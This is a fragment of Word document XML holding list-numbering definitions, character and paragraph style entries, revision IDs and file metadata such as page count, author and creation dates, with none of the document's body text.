        <w:ind w:left="4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0E1CF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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A9AA880">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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24F143B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="841457AA"/>
    <w:lvl w:ilvl="0" w:tplc="80BADAEC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>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A8788A">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525106">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500708">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1040666">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8E668E">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E689DC">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0839C2">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4876F8">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D0611F0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BC9C3AF6"/>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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="525558B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F6A83AA2"/>
    <w:lvl w:ilvl="0" w:tplc="AC90C46A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>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54B530">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26C4BC">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B025D6">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8968E70">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6211C2">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BC05B6">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20FF4A">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28B250">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41D14F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B066CFF6"/>
    <w:lvl w:ilvl="0" w:tplc="ABCE7900">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>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CE767A">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6CDD62">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0E721C">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8E94C2">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AA4008">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67A9396">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EC8D20">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2C12C8">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6DD1C08"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D041400"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="5"/>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2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="38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BEA6A10"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="54CEEA0A"/>
    <w:lvl w:ilvl="0" w:tplc="2BDE3224">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>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CF2D298">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A4E110">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F87D52">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3A5764">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5CBD9C">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F695DC">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AB0B8C4">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64DE64">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27E5082"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="010EB670"/>
    <w:lvl w:ilvl="0" w:tplc="CDE45EF2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="372" w:hanging="36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17" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="658B5AF7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0D7471E8"/>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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6D010C9B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83ACEE5A"/>
    <w:lvl w:ilvl="0" w:tplc="B4A0DF4E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>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EE3C50">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4ED6C0">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9C827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2A23BBC">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8A44E6">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300B22">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127472">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7E6BB8">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EBA2D1C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C028E4A"/>
    <w:lvl w:ilvl="0" w:tplc="2D5EEDBA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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5A0F12">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13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2C1D0A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="20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166386">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="27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CA5656">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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72E8F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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F8FC4A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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B8C5EB0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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227130">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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625698726">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1751534713">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="548034729">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="614562180">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1794788734">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1812551148">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1376739004">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1624075611">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="596640836">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="97263857">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1706910468">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1657954035">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="13500441">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="927805772">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="721442235">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1731608255">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1548031503">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1024675227">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1340502269">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="18645941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A97"/>
    <w:rsid w:val="0006531B"/>
    <w:rsid w:val="001E1AF4"/>
    <w:rsid w:val="00306CE1"/>
    <w:rsid w:val="004A4D63"/>
    <w:rsid w:val="00543C28"/>
    <w:rsid w:val="00575644"/>
    <w:rsid w:val="005E033B"/>
    <w:rsid w:val="00825B8C"/>
    <w:rsid w:val="008C61A3"/>
    <w:rsid w:val="00920A43"/>
    <w:rsid w:val="00AA3B21"/>
    <w:rsid w:val="00AD5226"/>
    <w:rsid w:val="00B44662"/>
    <w:rsid w:val="00E85008"/>
    <w:rsid w:val="00F2559A"/>
    <w:rsid w:val="00F91125"/>
    <w:rsid w:val="00FC7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20401"/>
  <w15:docId w15:val="{66541864-2DB4-47E6-AAC1-840A3D78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6" w:lineRule="auto"/>
      <w:ind w:left="21" w:right="1775" w:hanging="2"/>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16"/>
      </w:numPr>
      <w:spacing w:after="79" w:line="250" w:lineRule="auto"/>
      <w:ind w:left="37"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8C61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C61A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D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5226"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AD5226"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00F91125"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="008C61A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1A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21</Pages>
  <Words>7071</Words>
  <Characters>40311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Jagtap</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Atharva Jagtap</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-20T13:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-21T12:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>